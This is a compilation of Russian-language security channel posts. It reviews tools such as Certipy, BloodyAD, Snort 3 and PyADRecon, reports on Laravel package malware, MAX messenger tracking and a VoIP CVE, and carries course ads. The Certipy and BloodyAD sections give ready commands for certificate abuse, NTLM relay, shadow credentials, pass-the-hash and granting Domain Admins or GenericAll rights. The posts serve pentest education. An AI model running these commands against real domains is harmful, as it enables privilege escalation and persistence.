🐗 Snort 3 — современный IDS/IPS-движок для обнаружения и предотвращения атак

Snort 3 (Snort++) — это переработанная версия легендарного IDS/IPS-движка, используемого для анализа сетевого трафика и обнаружения атак в реальном времени. Проект развивает Cisco, а сам движок активно применяется как в корпоративных SOC, так и в лабораториях для анализа и эмуляции сетевых атак.

Snort 3 получил модульную архитектуру, Lua-конфигурацию и серьёзный прирост производительности по сравнению со Snort 2.x.

🧠 Основные возможности Snort 3
⏺️ Глубокий анализ трафика (Deep Packet Inspection) — детектирование атак на уровне L3–L7 с использованием сигнатур, протокольных декодеров и препроцессоров.
⏺️ Модульная архитектура — плагины можно включать/отключать, расширять и писать собственные инспекторы.
⏺️ Многопоточность — полноценная поддержка multithreading для высокой пропускной способности.
⏺️Lua-конфигурация — гибкая настройка через snort.lua вместо громоздкого snort.conf из 2-й версии.
⏺️IDS и IPS режимы — может работать как пассивный сенсор или как inline-IPS с блокировкой пакетов.
⏺️Совместимость с правилами Snort 2.x — можно использовать существующие rule-сеты (VRT, community rules и др.).


⛓️‍💥 Базовый сценарий использования
Запуск Snort в режиме IDS для анализа интерфейса:

snort -c snort.lua -i eth0

Проверка конфигурации перед запуском:

snort -c snort.lua -T

Анализ pcap-файла:

snort -c snort.lua -r traffic.pcap

Запуск в inline-режиме (IPS) через DAQ:

snort -Q --daq afpacket -i eth0 -c snort.lua

⬇️ Установка
🐧 Linux (из репозитория или сборка из исходников)

git clone https://github.com/snort3/snort3.git
cd snort3
export my_path=/path/to/snorty
./configure_cmake.sh --prefix=$my_path
cd build
make -j $(nproc) install

После установки — проверить версию:

snort -V

#ids #ips #networksecurity #soc #snort #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Certipy: Инструмент для аудита и эксплуатации служб сертификации Active Directory

Certipy — инструмент для перечисления, анализа и эксплуатации уязвимостей служб сертификации Active Directory (AD CS). Разработан для профессионального тестирования на проникновение и защиты инфраструктур, поддерживает полный спектр известных атак (ESC1–ESC16) и предоставляет возможности для обнаружения, запроса, подделки сертификатов и ретрансляции аутентификации.

🎇Certipy предназначен как для наступательных, так и для защитных задач, связанных с Active Directory Certificate Services. Инструмент обеспечивает комплексный подход к оценке безопасности PKI-инфраструктуры Windows. Функции:
▶️поиск центров сертификации (CA) и шаблонов сертификатов
▶️автоматическое выявление misconfigurations (ESC1–ESC16)
▶️создание сертификатов с заданными атрибутами
▶️использование сертификатов для получения доступа
▶️перехват и перенаправление NTLM-аутентификации на HTTP(S)/RPC-эндпоинты AD CS

⬇️Установка

pipx install certipy-ad

Проверка

certipy-ad -h

⏺️Перечисление AD CS (find)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10

⏺️Сохранение результатов (флаг -output)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -output results

⏺️Поиск уязвимостей (флаг -vulnerable)

certipy-ad find -u user@domain.local -p 'Password123!' -dc-ip 192.168.1.10 -vulnerable

⏺️Запрос сертификата (req)

certipy-ad req -u user@domain.local -p 'Password123!' -ca 'CA-SERVER' -template 'User'

⏺️Аутентификация по сертификату (auth)

certipy-ad auth -pfx user.pfx -dc-ip 192.168.1.10

⏺️Управление сертификатами (cert)

certipy-ad cert -pfx user.pfx -password 'Password123!' -export

⏺️Shadow Credentials атака (shadow)

certipy-ad shadow -u user@domain.local -p 'Password123!' -target 'computer$' -dc-ip 192.168.1.10

⏺️Ретрансляция NTLM (relay)

certipy-ad relay -ca 192.168.1.10 -template 'DomainController'

⏺️Справка по конкретной команде

certipy-ad find -h

👉Ограничения
- для эксплуатации многих уязвимостей требуются базовые права доменного пользователя
- необходим доступ к LDAP (389/636), RPC (135/445) и HTTP(S) (80/443) портам CA
- зависимости (impacket, ldap3, pyopenssl, asn1crypto и другие библиотеки)

#ActiveDirectory #AD #LDAP #Certipy #tool #pentest #ADCS

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

BloodyAD: Фреймворк для повышения привилегий в Active Directory

BloodyAD — инструмент, выполняющий специализированные LDAP-запросы к контроллеру домена. Поддерживает аутентификацию с использованием паролей в открытом виде, Pass-the-Hash, Pass-the-Ticket и сертификатов, обеспечивая гибкие возможности для тестирования безопасности AD-инфраструктур.

👉BloodyAD предоставляет возможность выполнять привилегированные операции через LDAP-протокол. Инструмент отличается следующими характеристиками:
▶️множество методов аутентификации (NTLM (пароль/хеш), Kerberos, сертификаты (Schannel, PKINIT))
▶️прозрачная работа через SOCKS-прокси
▶️поддержка LDAPS и шифрования
▶️интеграция с DNS-функциями Active Directory
▶️гибкая система команд для управления объектами AD

⬇️Установка

pipx install bloodyad

Проверка

bloodyad -h

⏺️Аутентификация с паролем (NTLM)

bloodyAD --host 192.168.1.10 -d bloody.local -u john.doe -p 'Password123!' get object user john.doe

⏺️Pass-the-Hash аутентификация

bloodyAD --host dc01.corp.local -d corp.local -u administrator -p :70016778cb0524c799ac25b439bd6a31 get group "Domain Admins"

⏺️Смена пароля пользователя

bloodyAD --host 172.16.1.15 -d bloody.local -u admin -p 'Admin123!' set password john.doe 'NewP@ssw0rd!'

⏺️Получение информации о пользователе

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get object user administrator --json

⏺️Добавление пользователя в группу

bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' add groupmember "Domain Admins" john.doe

⏺️Удаление пользователя из группы

bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' remove groupmember "Domain Admins" john.doe

⏺️Shadow Credentials (атака на основе сертификатов)

#добавление теневых учетных данных для пользователя
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' add shadowCredentials john.doe

#получение хеша из теневых учетных данных
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' get shadowCredentials john.doe

⏺️Изменение атрибутов безопасности

#добавление GenericAll права для пользователя на объект
bloodyAD --host dc.corp.local -d corp.local -u admin -p 'Admin123!' set genericall john.doe "CN=AdminSDHolder,CN=System,DC=corp,DC=local"

⏺️Поиск объектов с заданными атрибутами

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get search "(&(objectClass=user)(adminCount=1))"

⏺️Получение всех пользователей с непередаваемыми учетными записями

bloodyAD --host dc.corp.local -d corp.local -u user -p 'Password' get search "(userAccountControl:1.2.840.113556.1.4.803:=8192)"

🎇Ограничения и требования
- Для выполнения привилегированных операций требуются соответствующие права в AD
- Необходим доступ к портам LDAP (389/636) и, при необходимости, к Kerberos (88)
- Поддерживаются современные версии Python 3
- Кроссплатформенный инструмент (Windows, Linux, macOS)

#ActiveDirectory #AD #LDAP #BloodyAD #tool #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Как на самом деле работает режим инкогнито и гарантирует ли он приватность?

В новой статье рассказываем, почему приватный режим — это не анонимность.

Разбираем, почему режим инкогнито не делает вас невидимкой:
⏺️Кто на самом деле видит ваши запросы
⏺️Что такое фингерпринтинг и почему куки тут ни при чем
⏺️Как вас находят, даже если вы чистите историю

Также в статье:
➡️Как обеспечивать максимальную анонимность в сети, если это действительно необходимо
➡️А также рассмотрим сценарии, когда режим инкогнито может быть полезен

Читайте подробнее!

#анонимность #приватность #браузер

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

MAX следит за пользователями VPN?

🎇Пользователь runetfreedom на ресурсе Habr провел реверс-инжиниринг клиента российского мессенджера MAX (версия 26.4.3) и подтвердил, что приложение содержит модуль для слежки за использованием VPN и доступностью заблокированных ресурсов.

В ходе анализа трафика через mitmproxy и декомпиляции APK было установлено следующее:
1️⃣Приложение использует бинарный протокол (заголовок 10 байт + данные в формате MessagePack), который сложно декодировать стандартными средствами. Трафик замешивается с основными данными мессенджера, что делает невозможной его блокировку без отключения самого MAX.
2️⃣При сворачивании или разворачивании приложения на серверы api.oneme.ru уходит пакет со следующим содержимым:
- Список целей (main.telegram.org, mmg.whatsapp.net, gosuslugi.ru, gstatic.com, mtalk.google.com и другие)
- Результаты проверки (доступность хостов по ICMP (ping) и TCP-порту 443 (HTTPS). Это позволяет определить, заблокирован ли ресурс на уровне ТСПУ)
- IP-адрес устройства (запросы к списку сервисов (как российских, так и зарубежных) для определения реального IP)
- Статус VPN (флаг, показывающий, активно ли VPN-подключение на устройстве (через нативный Android API))
- Данные оператора (PLMN-код (MCC + MNC), позволяющий определить страну и оператора связи)
3️⃣Модуль включается и отключается сервером удаленно. При логине или обновлении сессии приходит конфигурация с флагом host-reachability, что позволяет активировать слежку точечно — для конкретных аккаунтов или групп.

🔎Выводы из исследования
▶️Модуль был разработан намеренно, это не случайный аналитический SDK
▶️ Методология проверки (ping + TCP:443) напрямую указывает на цель — мониторинг эффективности блокировок
▶️ Смешивание шпионского трафика с основным делает невозможным его отсечение без отключения всего мессенджера
▶️Сбор IP через микс российских и зарубежных сервисов помогает выявлять пользователей, которые не заворачивают весь трафик в VPN
▶️Возможность дистанционного включения функции для отдельных пользователей превращает приложение в инструмент тотальной слежки

❗️Автор исследования рекомендует:
▶️Удалить приложение
▶️Если удалить невозможно — установить его в изолированное рабочее пространство (Samsung Knox, Второе пространство на Xiaomi, Shelter на чистых Android). Такие среды обычно не наследуют VPN основного профиля
▶️Заблокировать на файерволе сервисы определения IP, которые использует приложение
▶️Рассказать другим — даже если пользователю нечего скрывать, такие инструменты лишают доступа к части интернета и бытового комфорта

❗️Официальный ответ MAX
В пресс-службе MAX заявили Habr, что приложение не отправляет запросы на серверы WhatsApp* и Telegram. Разработчики опубликовали детальные пояснения:
1️⃣IP-адреса нужны только для звонков (технология WebRTC требует внешний IP для построения прямого P2P-маршрута «телефон-телефон». Это стандарт для всех сервисов с подобными звонками)
2️⃣Запросы к Apple и Google необходимы для проверки доставки push-уведомлений в сложных сетевых условиях и при ограничениях связи в регионах
3️⃣MAX не отправляет запросы на серверы WhatsApp* и Telegram

В компании подчеркнули: решения направлены исключительно на качество звонков и уведомлений. К персональным данным, VPN и другим сервисам они не имеют отношения.

✉️Официальные пояснения не объясняют факты, вскрытые реверс-инжинирингом:
▶️Зачем для звонков проверять gosuslugi.ru и другие сторонние сайты?
▶️Почему кроме TCP:443 проверяется ICMP (ping) — классический метод тестирования блокировок в обход ТСПУ?
▶️Зачем безобидную информацию передавать в закрытом бинарном протоколе, замешивая с основным трафиком?
▶️Почему модуль управляется удаленно через серверный флаг host-reachability, включаясь точечно для отдельных аккаунтов?

Ответ разработчиков не закрывает эти вопросы. Выводы каждый делает сам.

*Принадлежит Meta, признанной экстремистской и запрещенной в РФ

#MAX #news #VPN #Habr

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

OSSLSignCode: Инструмент для подписи кода и проверки цифровых подписей

OSSLSignCode — утилита с открытым исходным кодом для подписи исполняемых файлов и проверки цифровых подписей с использованием криптографических библиотек OpenSSL. Инструмент предназначен для создания, добавления, извлечения и верификации подписей в форматах Authenticode (PE, MSI, CAB) и других, поддерживая гибкую настройку параметров подписи и работу с различными типами сертификатов.

↗️OSSLSignCode предоставляет функциональность, аналогичную стандартной утилите signtool из Windows SDK, но с открытым исходным кодом и поддержкой различных платформ. Инструмент позволяет:
▶️создание цифровых подписей для PE-файлов (.exe, .dll), MSI-пакетов, CAB-архивов
▶️получение встроенных подписей из подписанных файлов
▶️очистку файлов от существующих цифровых подписей
▶️верификацию целостности и подлинности подписанных файлов
▶️добавление timestamp от доверенных служб

⬇️Установка

sudo apt install osslsigncode

Проверка

osslsigncode -h

⏺️Базовая подпись исполняемого файла с описанием и временной меткой

osslsigncode sign \
  -pkcs12 code_signing_cert.p12 \
  -pass secure_password \
  -n "Application Name" \
  -i https://company.com \
  -t http://timestamp.digicert.com \
  -h sha256 \
  -in app.exe \
  -out app_signed.exe

Подписание файла с указанием описания, URL компании, добавлением доверенной временной метки и использованием современного хеш-алгоритма SHA256.

⏺️Подпись MSI-инсталлятора

osslsigncode sign \
  -pkcs12 cert.p12 \
  -pass password \
  -add-msi-dse \
  -t http://timestamp.digicert.com \
  -in installer.msi \
  -out installer_signed.msi

Специализированная подпись для MSI-пакетов с обязательным флагом -add-msi-dse, обеспечивающим корректную работу цифровой подписи.

⏺️Проверка подписи с полной валидацией цепочки сертификатов

osslsigncode verify \
  -in app_signed.exe \
  -CAfile trusted_roots.pem \
  -CRLfile crl.pem \
  -verbose \
  -require-leaf-hash sha256:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Комплексная проверка подписи, включающая валидацию по доверенным корневым сертификатам, проверку списков отзыва (CRL) и требование конкретного хеша листового сертификата для исключения подмены.

⏺️Извлечение подписи для анализа

osslsigncode extract-signature -pem -in app_signed.exe -out signature.pem

Извлечение встроенной подписи в PEM-формате для последующего анализа структуры PKCS#7, проверки сертификатов или интеграции с другими криптографическими инструментами.

⏺️Добавление временной метки к уже подписанному файлу

osslsigncode add \
  -t http://timestamp.sectigo.com \
  -in app_signed.exe \
  -out app_with_timestamp.exe

Обновление существующей подписи путем добавления актуальной временной метки без повторного подписания, что продлевает срок доверия к подписи после истечения сертификата.

🎇Ограничения и требования
- Требует установленной OpenSSL (версии 1.1.1 или 3.x)
- Поддерживаются PE, MSI, CAB
- Требуются действительные сертификаты подписи кода
- Для установки могут потребоваться права администратора

#OSSLSignCode #OpenSSL #tool #pentest #PKCS12 #MSI

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

🎇 В Packagist обнаружены вредоносные Laravel-пакеты, распространяющие RAT для Windows, macOS и Linux

Исследователи обнаружили вредоносные PHP-пакеты в репозитории Packagist, которые маскируются под вспомогательные библиотеки для Laravel. На самом деле они устанавливают кроссплатформенный троян удалённого доступа (RAT), способный работать на Windows, macOS и Linux.

Атака относится к классу supply chain attacks — злоумышленники распространяют вредоносный код через зависимости, которые разработчики устанавливают в свои проекты.

❗️ Вредоносные пакеты
Специалисты обнаружили следующие подозрительные пакеты:
▶️nhattuanbl/lara-helper
▶️nhattuanbl/simple-queue
▶️nhattuanbl/lara-swagger

Количество загрузок у них было небольшим, однако они всё равно представляют серьёзную угрозу для разработчиков и серверов, где используются.

Особенность атаки в том, что пакет lara-swagger не содержит вредоносный код напрямую — вместо этого он добавляет зависимость lara-helper, которая уже устанавливает RAT. Такой подход усложняет обнаружение угрозы.


❓Как работает вредоносный код
🔔 В пакетах lara-helper и simple-queue исследователи нашли PHP-файл:

src/helper.php

🔔 Вредоносный код использует несколько техник, чтобы затруднить анализ:
⏺️обфускацию потока управления
⏺️кодирование доменных имён
⏺️скрытие команд и путей
⏺️рандомизацию имён функций и переменных

Это значительно усложняет статический анализ и поиск вредоносной логики.

🕸 Подключение к серверу управления (C2)

После загрузки вредоносный код устанавливает соединение с сервером управления:
helper.leuleu[.]net:2096

Далее заражённая система отправляет информацию о системе и начинает ждать команды оператора. Это фактически даёт злоумышленнику полный удалённый доступ к машине.

Связь происходит по TCP через PHP-функцию:
stream_socket_client()

Благодаря этому вредоносный код остаётся работоспособным даже в средах с жёсткой конфигурацией безопасности PHP.

#rat #attack #laravel #windows #linux

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Открытие весеннего сезона и новые задания на платформе HackerLab!

Сезонный рейтинг:
С сегодняшнего дня вы можете побороться за лидирующие позиции рейтинга в новом сезоне на нашей платформе. Не упустите шанс провести весенние дни с пользой, прокачать свои навыки и стать лучшим!

Призы:
🥇1 место — 2 месяца подписки PRO на HackerLab + 30% скидка на любой курс Академии Кодебай, эксклюзивный бейдж на платформе
🥈2 место — 1 месяц подписки PRO на HackerLab + 20% скидка на любой курс Академии Кодебай, эксклюзивный бейдж на платформе
🥉3 место — 1 месяц подписки PRO на HackerLab + 10% скидка на любой курс Академии Кодебай, эксклюзивный бейдж на платформе
4-10 место — 1 месяц подписки PLUS на HackerLab + 5% скидка на любой курс Академии Кодебай, эксклюзивный бейдж на платформе

📆 Сезон завершается 31 мая
——————————————
🚩 Новые задания на платформе HackerLab!

⚙️ Категория Реверс-инжиниринг — Анализатор вселенной

🌍 Категория Веб — Документальный архив

Приятного хакинга!

❗️Новая Pro-лаборатория — Shadow Pipeline

Крупная технологическая корпорация, закрытая внутренняя сеть, подозрительное хранилище данных и минимальная точка входа. Ваша задача — проникнуть в инфраструктуру и выяснить, что скрывается в глубине сети.

Что внутри:
⏺️3 ВМ, 6 этапов
⏺️сценарий с постепенным развитием доступа
⏺️отличный формат для тренировки логики, разведки и работы во внутренних сетях

Лаборатория доступна по подписке Pro вместе с сотнями CTF-задач и курсами:
⏺️Введение в информационную безопасность
⏺️SQL Injection Master

Залетай и проверь, насколько хорошо ты умеешь двигаться по сети

▶️ https://hackerlab.pro/

☕️ Krakatau — инструмент для реверса и анализа Java-байткода

Krakatau — это open source-набор инструментов для анализа, дизассемблирования и декомпиляции Java-байткода. Утилита позволяет разбирать .class и .jar-файлы, исследовать структуру байткода и выполнять глубокий реверс Java-приложений.

Инструмент часто используется в reverse engineering, malware-анализе и security-исследованиях Java-ПО, где необходимо понять логику работы программы на уровне JVM-инструкций.


📐 Основные возможности Krakatau
📉 Дизассемблирование Java-байткода — преобразует .class-файлы в читаемый assembly-подобный формат JVM.
📉 Декомпиляция в Java-код — позволяет восстановить исходную логику программы из байткода.
📉 Ассемблер для JVM-байткода — можно модифицировать и пересобирать .class-файлы.
📉 Работа с JAR-архивами — поддерживает анализ и извлечение байткода из .jar.
📉 Подходит для malware-анализа — удобен для исследования обфусцированных Java-приложений.


⬇️ Установка
Krakatau v2 написан на Rust, поэтому сначала нужно установить Rust toolchain.

git clone https://github.com/Storyyeller/Krakatau.git
cd Krakatau
cargo build --release

После сборки бинарник появится в:

target/release/krak2

⏺️Его можно добавить в PATH или запускать напрямую.


💻 Базовый сценарий использования

1️⃣ Дизассемблирование .class-файла:

krak2 dis --out out_dir Example.class

2️⃣ Дизассемблирование .jar-архива:

krak2 dis --out disassembled.zip app.jar

3️⃣ Сборка .class из .j-файла:

krak2 asm --out Foo.class Foo.j

4️⃣ Сборка .jar из набора .j файлов:

krak2 asm --out modified.jar source_dir/

#reverse #java #malware #security #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

➡️Как обнаружить атаку на AD, когда не видно ничего подозрительного?

Изучите техники и методики атак на инфраструктуру Active Directory!

Наша практическая лаборатория содержит более 30 виртуальных машин, которые вам предстоит сломать. Бросаем вызов с 16 марта 🚗

➡️ Регистрация

Содержание курса:
⏺️AD-сети с миксом Windows/Linux
⏺️Харденинг в AD, добыча критичной информации, развитие по инфраструктуре
⏺️Захват и укрепление позиций внутри инфраструктуры
⏺️Применение и анализ популярных эксплоитов

Авторы курса: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff

😀☺️😚🥲😎Дарим доступ к 20+ заданиям на взлом AD на hackerlab.pro при записи на курс!

Rapid7 Labs провела исследовательский проект по поиску уязвимостей нулевого дня в телефонах Grandstream GXP1600 серии Voice over Internet Protocol (VoIP).

VoIP-телефония (Voice over Internet Protocol) используется в крупных организациях для организации корпоративной телефонии. Технология позволяет передавать голосовые сообщения через интернет, в отличие от традиционной телефонии, использующей аналоговые сигналы и телефонные линии.

В результате исследования была обнаружена критическая уязвимость, связанная с переполнением буфера в стеке без аутентификации, CVE-2026-2329. Удаленный злоумышленник может использовать CVE-2026-2329 для удаленного выполнения кода (RCE) без аутентификации с правами суперпользователя на целевом устройстве.

❗️ Уязвимость присутствует в веб-сервисе API устройства и доступна в конфигурации по умолчанию. Поскольку все модели серии GXP1600 имеют общую прошивку, уязвимость затрагивает все шесть моделей этой серии: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628 и GXP1630.

👉 Метрики

Базовая оценка: 9.8 (Критический)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

💵 Последствия
1️⃣Для демонстрации последствий был разработан модуль эксплойта Metasploit. Он показывает, как злоумышленник без аутентификации может воспользоваться этой уязвимостью, чтобы получить права суперпользователя на уязвимом устройстве.

2️⃣Также был разработан дополнительный модуль для постэксплуатации. Это позволяет злоумышленнику получить учетные данные, такие как данные локальных пользователей и учетные записи SIP, хранящиеся на взломанном устройстве GXP1600.

3️⃣Кроме того, злоумышленник может перенастроить целевое устройство для использования вредоносного SIP-прокси, что позволит злоумышленнику беспрепятственно перехватывать телефонные звонки на устройстве и с него, а также прослушивать аудио.

🛡Рекомендации
Обновить прошивку устройств до версии 1.0.7.81 в соответствие с рекомендациями производителя.

#news #CVE #VoIP #infrastructure

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

PyADRecon: Инструмент для анализа Active Directory

PyADRecon — приложение с открытым исходным кодом для анализа и аудита Active Directory, позволяющее собирать и структурировать информацию о пользователях, компьютерах и объектах домена. Инструмент предоставляет возможности экспорта данных в форматы CSV, XLSX и HTML, поддерживает аутентификацию NTLM и Kerberos и не требует навыков программирования для использования.

PyADRecon спроектирован для упрощения сбора и анализа данных Active Directory, предоставляя как интерактивный графический интерфейс, так и функциональность командной строки для автоматизации. Основные функции:
▶️Получение информации о пользователях, компьютерах, группах и других объектах
▶️Поддержка NTLM и Kerberos, включая использование TGT-файлов
▶️Множество форматов экспорта (CSV, Excel (XLSX), HTML-дашборды)
▶️Генерация отчетов из ранее сохраненных CSV-файлов без подключения к AD
▶️Кроссплатформенность (работа на Windows, macOS и Linux)

⬇️Установка

pipx install PyADRecon

Проверка

pyadrecon -h

⏺️Базовый сбор данных с NTLM-аутентификацией

pyadrecon -dc 192.168.1.10 -u administrator -p 'Password123!' -d DOMAIN.LOCAL

⏺️Сбор с аутентификацией Kerberos (обход channel binding)

pyadrecon -dc dc01.domain.local -u admin -p 'Password123!' -d DOMAIN.LOCAL --auth kerberos

⏺️Генерация HTML-дашборда из CSV-файлов

pyadrecon --generate-dashboard-from /path/to/csv/files -o dashboard.html

⏺️Аудит неактивных учетных записей

pyadrecon -dc dc01.domain.local -u auditor -p 'Password123!' -d DOMAIN.LOCAL --dormant-days 60 --collect users --only-enabled

⏺️Инвентаризация компьютеров в домене

pyadrecon -dc dc01.domain.local -u admin -p 'Password123!' -d DOMAIN.LOCAL --collect computers -o computer_inventory

⏺️Еженедельный отчет с ротацией

#!/bin/bash
DATE=$(date +%Y%m%d)
pyadrecon -dc dc01.domain.local -u svc_report -p 'Password123!' -d DOMAIN.LOCAL -o "ad_report_$DATE"

⏺️Анализ устаревших паролей

pyadrecon -dc dc01.domain.local -u admin -p 'Password123!' -d DOMAIN.LOCAL --collect users --password-age 90 --only-enabled

👉Ограничения
- Необходима учетная запись с правами на чтение объектов AD
- Требуется доступ к контроллеру домена (порты 389/636)
- Для аутентификации Kerberos требуется корректная настройка времени и DNS
- При больших доменах (более 5000 объектов) рекомендуется увеличить --page-size

#PyADRecon #ActiveDirectory #ADRecon #Kerberos #Audit #tool #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Как понять, какое направление в ИБ стоит сейчас рассматривать?

Мы создали навигатор по профессиям и направлениям в ИБ, который определит варианты развития в зависимости от вашей текущей ситуации, и покажет открытые курсы Академии.

👉👉👉 Пройти навигатор можно за 30 секунд по ссылке